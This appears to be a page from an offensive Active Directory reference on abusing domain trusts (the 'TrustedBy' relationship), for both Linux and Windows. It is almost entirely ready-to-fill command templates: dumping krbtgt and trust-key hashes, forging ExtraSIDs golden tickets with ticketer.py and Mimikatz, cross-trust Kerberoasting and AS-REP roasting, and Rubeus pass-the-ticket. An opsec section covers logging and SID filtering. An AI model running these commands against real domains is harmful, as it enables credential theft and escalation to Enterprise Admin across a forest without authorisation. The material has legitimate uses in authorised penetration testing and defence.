TrustedBy
Domain A is trusted by Domain B, meaning principals in Domain A can authenticate to resources in Domain B. Enables cross-trust lateral movement and ExtraSIDs attacks.
Applies to: Domain β Domain
Linux Abuse
Enumerate trusts
GetADUsers.py -all -dc-ip <dc-ip> '<domain>/<username>:<password>'
ldapsearch -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' -b 'DC=<domain>,DC=<tld>' '(objectClass=trustedDomain)'
Cross-trust TGS request (getST)
# Get TGS for service in trusted domain using credentials from trusting domain
getST.py -spn '<spn>/<target-computer>.<target-domain>' -dc-ip <dc-ip> -target-domain <target-domain> '<domain>/<username>:<password>'
Cross-trust with ccache
KRB5CCNAME=<ccache> getST.py -spn 'cifs/<target-computer>.<target-domain>' -dc-ip <target-dc-ip> -target-domain <target-domain> -k -no-pass '<domain>/<username>'
ExtraSIDs Attack β Forge golden ticket with SID History (inter-forest)
# Step 1: Get krbtgt hash of child domain
secretsdump.py '<child-domain>/<username>:<password>'@<child-dc-ip> -just-dc-user 'krbtgt'
# Step 2: Get Enterprise Admins SID of parent domain (S-1-5-21-<parent>-519)
lookupsid.py '<domain>/<username>:<password>'@<parent-dc-ip> | grep -i enterprise
# Step 3: Forge golden ticket with ExtraSIDs
ticketer.py -nthash <krbtgt-hash> -domain-sid <child-domain-sid> -domain <child-domain> -extra-sid <parent-enterprise-admins-sid> Administrator
# Step 4: Use ticket against parent DC
KRB5CCNAME=Administrator.ccache secretsdump.py -k -no-pass '<child-domain>/Administrator'@<parent-dc-fqdn>
Child-to-Parent via trust key (alternative to krbtgt)
# Get trust key
secretsdump.py '<child-domain>/<username>:<password>'@<child-dc-ip> -just-dc-user '<child-domain>$'
# Forge inter-realm TGT
ticketer.py -nthash <trust-key-hash> -domain-sid <child-domain-sid> -domain <child-domain> -extra-sid <parent-enterprise-admins-sid> -spn 'krbtgt/<parent-domain>' Administrator
# Get usable TGS from parent DC
KRB5CCNAME=Administrator.ccache getST.py -k -no-pass -spn 'cifs/<parent-dc-fqdn>' -dc-ip <parent-dc-ip> '<child-domain>/Administrator'
Cross-trust Kerberoast
GetUserSPNs.py -target-domain <target-domain> -dc-ip <dc-ip> '<domain>/<username>:<password>'
Cross-trust AS-REP Roast
GetNPUsers.py <target-domain>/ -dc-ip <target-dc-ip> -usersfile users.txt -no-pass
Windows Abuse
Enumerate trusts (PowerView)
Get-DomainTrust
Get-ForestTrust
Get-DomainTrust -Domain <target-domain>
Cross-trust lateral movement (Rubeus)
# Request TGT in current domain
Rubeus.exe asktgt /user:<username> /password:<password> /domain:<domain> /dc:<dc-ip> /nowrap
# Request cross-realm TGS
Rubeus.exe asktgs /ticket:<base64-tgt> /service:'cifs/<target-computer>.<target-domain>' /dc:<target-dc-ip> /targetdomain:<target-domain> /ptt
ExtraSIDs Golden Ticket (Mimikatz)
# Forge golden ticket with SID history pointing to EA
mimikatz "kerberos::golden /user:Administrator /domain:<child-domain> /sid:<child-domain-sid> /krbtgt:<krbtgt-hash> /sids:<parent-enterprise-admins-sid> /ptt" exit
# Access parent DC
dir \\<parent-dc-fqdn>\C$
Kerberoast across trust (PowerView)
Get-DomainUser -SPN -Domain <target-domain> | Get-DomainSPNTicket -OutputFormat Hashcat -Domain <target-domain>
Opsec
- Cross-trust TGS requests are logged on the trusting domain's DC
- ExtraSIDs/golden ticket attacks bypass audit if SID filtering is not enforced (check
netdom trust <domain> /domain:<target-domain> /quarantine) - SID filtering (quarantine) blocks ExtraSIDs for forest trusts β check with
Get-DomainTrust | Select-Object TrustAttributes - TrustAttributes 0x4 = WITHIN_FOREST (SID filtering off), 0x20 = FOREST_TRANSITIVE